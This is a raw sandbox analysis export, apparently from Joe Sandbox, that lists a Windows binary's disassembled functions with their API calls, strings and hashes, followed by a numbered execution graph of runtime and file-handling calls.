                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID: Shell.Explorer$about:blank
                                                                                                                                                      • API String ID: 431132790-874089819
                                                                                                                                                      • Opcode ID: 87a400f5b57b401e3257dd83094d1696a98fdae2c22a5a0aaa4555a24aadaab9
                                                                                                                                                      • Instruction ID: 2f30db98fcafb2ae36086dfb95591d97dfedb5176a56a7d6dbce29641752f366
                                                                                                                                                      • Opcode Fuzzy Hash: 87a400f5b57b401e3257dd83094d1696a98fdae2c22a5a0aaa4555a24aadaab9
                                                                                                                                                      • Instruction Fuzzy Hash: 2F416E74A00301DFDB08EFA4D991B6AB7B5BF88700F15846DF906AF291DB70AD00CB51
                                                                                                                                                      Function 00A40110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A4017B
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A401B9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$DialogWindow
                                                                                                                                                      • String ID: GETPASSWORD1
                                                                                                                                                      • API String ID: 445417207-3292211884
                                                                                                                                                      • Opcode ID: ef5187972e5ba3ed271c9b1d2b3487fd3980f65142f5cfbd3d34a622422fdc43
                                                                                                                                                      • Instruction ID: 84af0923d036ebf86d1708d292571a25d048edd4e872b4962eef443d457e500b
                                                                                                                                                      • Opcode Fuzzy Hash: ef5187972e5ba3ed271c9b1d2b3487fd3980f65142f5cfbd3d34a622422fdc43
                                                                                                                                                      • Instruction Fuzzy Hash: DF1104B6A44314BBD220DB789C49FFB77ACEBC5711F404A29F749A7180C770A842A6B5
                                                                                                                                                      Function 00A35109 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A35094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A350B3
                                                                                                                                                        • Part of subcall function 00A35094: GetProcAddress.KERNEL32(00A751F8,CryptUnprotectMemory), ref: 00A350C3
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000200,?,00A35104), ref: 00A35197
                                                                                                                                                      Strings
                                                                                                                                                      • CryptProtectMemory failed, xrefs: 00A3514E
                                                                                                                                                      • CryptUnprotectMemory failed, xrefs: 00A3518F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                      • API String ID: 2190909847-396321323
                                                                                                                                                      • Opcode ID: 77f5e098588ff9a32c2b51f3a133a28e910a0c0d6d2238962eb9ad5b6bfa47c2
                                                                                                                                                      • Instruction ID: 945863da3cf0f743c2e56554010805fdd1a135ae130c7a4cb628ce8f43e29854
                                                                                                                                                      • Opcode Fuzzy Hash: 77f5e098588ff9a32c2b51f3a133a28e910a0c0d6d2238962eb9ad5b6bfa47c2
                                                                                                                                                      • Instruction Fuzzy Hash: C311D331E01B24ABDB15AF78AC01AAE3B65BF40B61F008215FC196B296D770AD42C6D4
                                                                                                                                                      Function 00A44264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • IsWindowVisible.USER32(00010452), ref: 00A44291
                                                                                                                                                      • DialogBoxParamW.USER32(GETPASSWORD1,00010452,00A40110,?), ref: 00A442BA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogParamVisibleWindow
                                                                                                                                                      • String ID: GETPASSWORD1
                                                                                                                                                      • API String ID: 3157717868-3292211884
                                                                                                                                                      • Opcode ID: e812e129abab8ff34f6bb48f0240f351da3ab100c68f16e8cedf1e9e7c2395a9
                                                                                                                                                      • Instruction ID: 25ed0d63b15912374a56d355ee5529d8d7031babeed89ca74e8e2f66c0a0e4b1
                                                                                                                                                      • Opcode Fuzzy Hash: e812e129abab8ff34f6bb48f0240f351da3ab100c68f16e8cedf1e9e7c2395a9
                                                                                                                                                      • Instruction Fuzzy Hash: DD016D34686724BFC700EBB89C16FDB37D8BB46311B00C615F809971A5CAF08881DB61
                                                                                                                                                      Function 00A21E44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A33EAA: _swprintf.LIBCMT ref: 00A33EEA
                                                                                                                                                        • Part of subcall function 00A33EAA: _strlen.LIBCMT ref: 00A33F0B
                                                                                                                                                        • Part of subcall function 00A33EAA: SetDlgItemTextW.USER32(?,00A6919C,?), ref: 00A33F64
                                                                                                                                                        • Part of subcall function 00A33EAA: GetWindowRect.USER32(?,?), ref: 00A33F9A
                                                                                                                                                        • Part of subcall function 00A33EAA: GetClientRect.USER32(?,?), ref: 00A33FA6
                                                                                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                      • SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 2622349952-4108050209
                                                                                                                                                      • Opcode ID: fce4de01df97ca121def485dd1462e47e712ec184eece149d73108dcf5f89f07
                                                                                                                                                      • Instruction ID: 14ce7382ef355349090ff2246d5185a727067b57b618e1f397382371603fa0f8
                                                                                                                                                      • Opcode Fuzzy Hash: fce4de01df97ca121def485dd1462e47e712ec184eece149d73108dcf5f89f07
                                                                                                                                                      • Instruction Fuzzy Hash: A9F0C230544398AADF154F64EE0ABFB3BAABF24304F458274FC48541A1C7B4CB95DB60
                                                                                                                                                      Function 00A4536D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A45379
                                                                                                                                                        • Part of subcall function 00A452FB: std::exception::exception.LIBCONCRT ref: 00A45308
                                                                                                                                                        • Part of subcall function 00A4734A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00A4536C,?,00A66C54,?), ref: 00A473AA
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A4539F
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionRaise$AccessDloadHelper2@8LoadReleaseSectionWrite___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                      • String ID: @UJu
                                                                                                                                                      • API String ID: 1552410523-4208871750
                                                                                                                                                      • Opcode ID: 95479e83307cc46baf836824a5f2e4506c254f93b8a0b4b3f3123d0e62cb5981
                                                                                                                                                      • Instruction ID: e8e2b7851924ea8595be19099c9dcc8b571c068a52949f5bdc401bb97bf7b043
                                                                                                                                                      • Opcode Fuzzy Hash: 95479e83307cc46baf836824a5f2e4506c254f93b8a0b4b3f3123d0e62cb5981
                                                                                                                                                      • Instruction Fuzzy Hash: B5D05B6DD1C60CBB9704BAF0DD16CBE373CE980B00F618515F940D5482EAA0650555A1
                                                                                                                                                      Function 00A375ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00A3770A,?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375F3
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375FF
                                                                                                                                                        • Part of subcall function 00A292EB: __EH_prolog3_GS.LIBCMT ref: 00A292F2
                                                                                                                                                      Strings
                                                                                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A37608
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                      • API String ID: 2419225763-2248577382
                                                                                                                                                      • Opcode ID: 9fe4ea9c1ec78726f7c71e821112dcb996055b91651342db898c50befeaff452
                                                                                                                                                      • Instruction ID: 112a74fa45e5b8851a153a7ebda52449fbc1d3b5bdadbaefa5b1542225a74330
                                                                                                                                                      • Opcode Fuzzy Hash: 9fe4ea9c1ec78726f7c71e821112dcb996055b91651342db898c50befeaff452
                                                                                                                                                      • Instruction Fuzzy Hash: EBD05B71548631BBD56063687D0ACDF7919EB11731F510714F535651E9DB200C424399
                                                                                                                                                      Function 00A33E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,5C02E116), ref: 00A33E65
                                                                                                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00A33E73
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindHandleModuleResource
                                                                                                                                                      • String ID: RTL
                                                                                                                                                      • API String ID: 3537982541-834975271
                                                                                                                                                      • Opcode ID: a32ecb63773c982f7696db423bb977cf2ba9deb858c8fe600deaae9661a237c5
                                                                                                                                                      • Instruction ID: 955b402678605c107400e13b24bf522c076d4ffb8521c96e975f0d6ceea03e47
                                                                                                                                                      • Opcode Fuzzy Hash: a32ecb63773c982f7696db423bb977cf2ba9deb858c8fe600deaae9661a237c5
                                                                                                                                                      • Instruction Fuzzy Hash: 67C01272644310AEE77057B16C0DB532D98BB04B26F050458F9059A0C4D5E9D8418B90
                                                                                                                                                      Function 00A52B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                      • String ID: `&C
                                                                                                                                                      • API String ID: 3253501508-2610790716
                                                                                                                                                      • Opcode ID: 2f65eaac40c46d17f78927373da6c9015dd674da652073b2923d7f26fead1a49
                                                                                                                                                      • Instruction ID: 5b00ad2adecf4c1ceffdf80e20708628a818d391da0ebea135ceaf3110fc4aa5
                                                                                                                                                      • Opcode Fuzzy Hash: 2f65eaac40c46d17f78927373da6c9015dd674da652073b2923d7f26fead1a49
                                                                                                                                                      • Instruction Fuzzy Hash: 39B048B8810B008FCB04CFB0AC192083AE0F6296673809656D80982225D6361083CF00

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:1.8%
                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                      Total number of Limit Nodes:80
                                                                                                                                                      execution_graph 95707 531033 95712 536686 95707->95712 95711 531042 95713 53bf07 8 API calls 95712->95713 95714 5366f4 95713->95714 95721 5355cc 95714->95721 95716 5756e4 95718 536791 95718->95716 95719 531038 95718->95719 95724 5368e6 8 API calls __fread_nolock 95718->95724 95720 550433 29 API calls __onexit 95719->95720 95720->95711 95725 5355f8 95721->95725 95724->95718 95726 535605 95725->95726 95727 5355eb 95725->95727 95726->95727 95728 53560c RegOpenKeyExW 95726->95728 95727->95718 95728->95727 95729 535626 RegQueryValueExW 95728->95729 95730 535647 95729->95730 95731 53565c RegCloseKey 95729->95731 95730->95731 95731->95727 95732 58e5f8 GetUserNameW 95733 58e610 95732->95733 95734 53f470 95737 549fa5 95734->95737 95736 53f47c 95738 549fc6 95737->95738 95744 54a023 95737->95744 95740 5402f0 254 API calls 95738->95740 95738->95744 95743 549ff7 95740->95743 95741 58800f 95741->95741 95742 54a067 95742->95736 95743->95742 95743->95744 95745 53be6d 8 API calls 95743->95745 95744->95742 95746 5a3ef6 81 API calls __wsopen_s 95744->95746 95745->95744 95746->95741 92604 5594d1 92614 55e048 92604->92614 92608 5594de 92627 56510a 92608->92627 92611 559508 92631 562d58 92611->92631 92613 559513 92637 55e051 92614->92637 92616 5594d9 92617 56506a 92616->92617 92618 565076 ___scrt_is_nonwritable_in_current_image 92617->92618 92654 5632ee EnterCriticalSection 92618->92654 92620 5650ec 92655 565101 92620->92655 92622 5650f8 __wsopen_s 92622->92608 92623 5650c0 DeleteCriticalSection 92625 562d58 _free 20 API calls 92623->92625 92626 565081 92625->92626 92626->92620 92626->92623 92658 55ea08 92626->92658 92628 5594ed DeleteCriticalSection 92627->92628 92629 565120 92627->92629 92628->92608 92628->92611 92629->92628 92630 562d58 _free 20 API calls 92629->92630 92630->92628 92632 562d63 RtlFreeHeap 92631->92632 92633 562d8c __dosmaperr 92631->92633 92632->92633 92634 562d78 92632->92634 92633->92613 92782 55f669 20 API calls __dosmaperr 92634->92782 92636 562d7e GetLastError 92636->92633 92638 55e05d ___scrt_is_nonwritable_in_current_image 92637->92638 92647 5632ee EnterCriticalSection 92638->92647 92640 55e100 92648 55e120 92640->92648 92644 55e10c __wsopen_s 92644->92616 92645 55e001 66 API calls 92646 55e06c 92645->92646 92646->92640 92646->92645 92651 55951d EnterCriticalSection 92646->92651 92652 55e0f6 LeaveCriticalSection __fread_nolock 92646->92652 92647->92646 92653 563336 LeaveCriticalSection 92648->92653 92650 55e127 92650->92644 92651->92646 92652->92646 92653->92650 92654->92626 92671 563336 LeaveCriticalSection 92655->92671 92657 565108 92657->92622 92659 55ea14 ___scrt_is_nonwritable_in_current_image 92658->92659 92660 55ea25 92659->92660 92661 55ea3a 92659->92661 92689 55f669 20 API calls __dosmaperr 92660->92689 92670 55ea35 __wsopen_s 92661->92670 92672 55951d EnterCriticalSection 92661->92672 92664 55ea2a 92690 562b7c 26 API calls __cftof 92664->92690 92665 55ea56 92673 55e992 92665->92673 92668 55ea61 92691 55ea7e LeaveCriticalSection __fread_nolock 92668->92691 92670->92626 92671->92657 92672->92665 92674 55e9b4 92673->92674 92675 55e99f 92673->92675 92681 55e9af 92674->92681 92692 55df9b 92674->92692 92720 55f669 20 API calls __dosmaperr 92675->92720 92678 55e9a4 92721 562b7c 26 API calls __cftof 92678->92721 92681->92668 92682 56510a 20 API calls 92683 55e9d0 92682->92683 92698 55dce5 92683->92698 92685 55e9d6 92705 5689bf 92685->92705 92688 562d58 _free 20 API calls 92688->92681 92689->92664 92690->92670 92691->92670 92693 55dfb3 92692->92693 92694 55dfaf 92692->92694 92693->92694 92695 55dce5 __fread_nolock 26 API calls 92693->92695 92694->92682 92696 55dfd3 92695->92696 92722 565d4e 62 API calls 4 library calls 92696->92722 92699 55dd06 92698->92699 92700 55dcf1 92698->92700 92699->92685 92723 55f669 20 API calls __dosmaperr 92700->92723 92702 55dcf6 92724 562b7c 26 API calls __cftof 92702->92724 92704 55dd01 92704->92685 92706 5689e3 92705->92706 92707 5689ce 92705->92707 92708 568a1e 92706->92708 92712 568a0a 92706->92712 92728 55f656 20 API calls __dosmaperr 92707->92728 92730 55f656 20 API calls __dosmaperr 92708->92730 92711 5689d3 92729 55f669 20 API calls __dosmaperr 92711->92729 92725 568997 92712->92725 92713 568a23 92731 55f669 20 API calls __dosmaperr 92713->92731 92717 55e9dc 92717->92681 92717->92688 92718 568a2b 92732 562b7c 26 API calls __cftof 92718->92732 92720->92678 92721->92681 92722->92694 92723->92702 92724->92704 92733 568915 92725->92733 92727 5689bb 92727->92717 92728->92711 92729->92717 92730->92713 92731->92718 92732->92717 92734 568921 ___scrt_is_nonwritable_in_current_image 92733->92734 92744 5654d7 EnterCriticalSection 92734->92744 92736 56892f 92737 568956 92736->92737 92738 568961 92736->92738 92745 568a3e 92737->92745 92760 55f669 20 API calls __dosmaperr 92738->92760 92741 56895c 92761 56898b LeaveCriticalSection __wsopen_s 92741->92761 92743 56897e __wsopen_s 92743->92727 92744->92736 92762 565754 92745->92762 92747 568a54 92775 5656c3 21 API calls 2 library calls 92747->92775 92748 568a4e 92748->92747 92750 568a86 92748->92750 92751 565754 __wsopen_s 26 API calls 92748->92751 92750->92747 92752 565754 __wsopen_s 26 API calls 92750->92752 92754 568a7d 92751->92754 92755 568a92 CloseHandle 92752->92755 92753 568aac 92756 568ace 92753->92756 92776 55f633 20 API calls __dosmaperr 92753->92776 92757 565754 __wsopen_s 26 API calls 92754->92757 92755->92747 92758 568a9e GetLastError 92755->92758 92756->92741 92757->92750 92758->92747 92760->92741 92761->92743 92763 565761 92762->92763 92765 565776 92762->92765 92777 55f656 20 API calls __dosmaperr 92763->92777 92768 56579b 92765->92768 92779 55f656 20 API calls __dosmaperr 92765->92779 92767 565766 92778 55f669 20 API calls __dosmaperr 92767->92778 92768->92748 92769 5657a6 92780 55f669 20 API calls __dosmaperr 92769->92780 92772 56576e 92772->92748 92773 5657ae 92781 562b7c 26 API calls __cftof 92773->92781 92775->92753 92776->92756 92777->92767 92778->92772 92779->92769 92780->92773 92781->92772 92782->92636 92783 568792 92788 56854e 92783->92788 92786 5687ba 92793 56857f try_get_first_available_module 92788->92793 92790 56877e 92812 562b7c 26 API calls __cftof 92790->92812 92792 5686d3 92792->92786 92800 570d24 92792->92800 92799 5686c8 92793->92799 92803 55919b 92793->92803 92796 55919b 40 API calls 92797 56873b 92796->92797 92798 55919b 40 API calls 92797->92798 92797->92799 92798->92799 92799->92792 92811 55f669 20 API calls __dosmaperr 92799->92811 92816 570421 92800->92816 92802 570d3f 92802->92786 92804 5591af 92803->92804 92805 55923b 92803->92805 92810 5591d1 92804->92810 92813 55f669 20 API calls __dosmaperr 92804->92813 92815 559253 40 API calls 4 library calls 92805->92815 92808 5591c6 92814 562b7c 26 API calls __cftof 92808->92814 92810->92796 92810->92799 92811->92790 92812->92792 92813->92808 92814->92810 92815->92810 92819 57042d ___scrt_is_nonwritable_in_current_image 92816->92819 92817 57043b 92874 55f669 20 API calls __dosmaperr 92817->92874 92819->92817 92821 570474 92819->92821 92820 570440 92875 562b7c 26 API calls __cftof 92820->92875 92827 5709fb 92821->92827 92826 57044a __wsopen_s 92826->92802 92877 5707cf 92827->92877 92830 570a46 92895 5655b1 92830->92895 92831 570a2d 92909 55f656 20 API calls __dosmaperr 92831->92909 92834 570a32 92910 55f669 20 API calls __dosmaperr 92834->92910 92835 570a4b 92836 570a54 92835->92836 92837 570a6b 92835->92837 92911 55f656 20 API calls __dosmaperr 92836->92911 92908 57073a CreateFileW 92837->92908 92841 570a59 92912 55f669 20 API calls __dosmaperr 92841->92912 92842 570b21 GetFileType 92845 570b73 92842->92845 92846 570b2c GetLastError 92842->92846 92844 570af6 GetLastError 92914 55f633 20 API calls __dosmaperr 92844->92914 92917 5654fa 21 API calls 2 library calls 92845->92917 92915 55f633 20 API calls __dosmaperr 92846->92915 92847 570aa4 92847->92842 92847->92844 92913 57073a CreateFileW 92847->92913 92851 570b3a CloseHandle 92851->92834 92854 570b63 92851->92854 92853 570ae9 92853->92842 92853->92844 92916 55f669 20 API calls __dosmaperr 92854->92916 92856 570b68 92856->92834 92857 570be0 92862 570c0d 92857->92862 92919 5704ed 72 API calls 4 library calls 92857->92919 92858 570b94 92858->92857 92918 57094b 72 API calls 3 library calls 92858->92918 92861 570c06 92861->92862 92863 570c1e 92861->92863 92864 568a3e __wsopen_s 29 API calls 92862->92864 92865 570498 92863->92865 92866 570c9c CloseHandle 92863->92866 92864->92865 92876 5704c1 LeaveCriticalSection __wsopen_s 92865->92876 92920 57073a CreateFileW 92866->92920 92868 570cc7 92869 570cfd 92868->92869 92870 570cd1 GetLastError 92868->92870 92869->92865 92921 55f633 20 API calls __dosmaperr 92870->92921 92872 570cdd 92922 5656c3 21 API calls 2 library calls 92872->92922 92874->92820 92875->92826 92876->92826 92878 57080a 92877->92878 92879 5707f0 92877->92879 92923 57075f 92878->92923 92879->92878 92930 55f669 20 API calls __dosmaperr 92879->92930 92882 5707ff 92931 562b7c 26 API calls __cftof 92882->92931 92884 570842 92885 570871 92884->92885 92932 55f669 20 API calls __dosmaperr 92884->92932 92893 5708c4 92885->92893 92934 55da9d 26 API calls 2 library calls 92885->92934 92888 5708bf 92890 57093e 92888->92890 92888->92893 92889 570866 92933 562b7c 26 API calls __cftof 92889->92933 92935 562b8c 11 API calls _abort 92890->92935 92893->92830 92893->92831 92894 57094a 92896 5655bd ___scrt_is_nonwritable_in_current_image 92895->92896 92938 5632ee EnterCriticalSection 92896->92938 92898 5655c4 92900 5655e9 92898->92900 92904 565657 EnterCriticalSection 92898->92904 92906 56560b 92898->92906 92942 565390 21 API calls 3 library calls 92900->92942 92901 565634 __wsopen_s 92901->92835 92903 5655ee 92903->92906 92943 5654d7 EnterCriticalSection 92903->92943 92905 565664 LeaveCriticalSection 92904->92905 92904->92906 92905->92898 92939 5656ba 92906->92939 92908->92847 92909->92834 92910->92865 92911->92841 92912->92834 92913->92853 92914->92834 92915->92851 92916->92856 92917->92858 92918->92857 92919->92861 92920->92868 92921->92872 92922->92869 92926 570777 92923->92926 92924 570792 92924->92884 92926->92924 92936 55f669 20 API calls __dosmaperr 92926->92936 92927 5707b6 92937 562b7c 26 API calls __cftof 92927->92937 92929 5707c1 92929->92884 92930->92882 92931->92878 92932->92889 92933->92885 92934->92888 92935->92894 92936->92927 92937->92929 92938->92898 92944 563336 LeaveCriticalSection 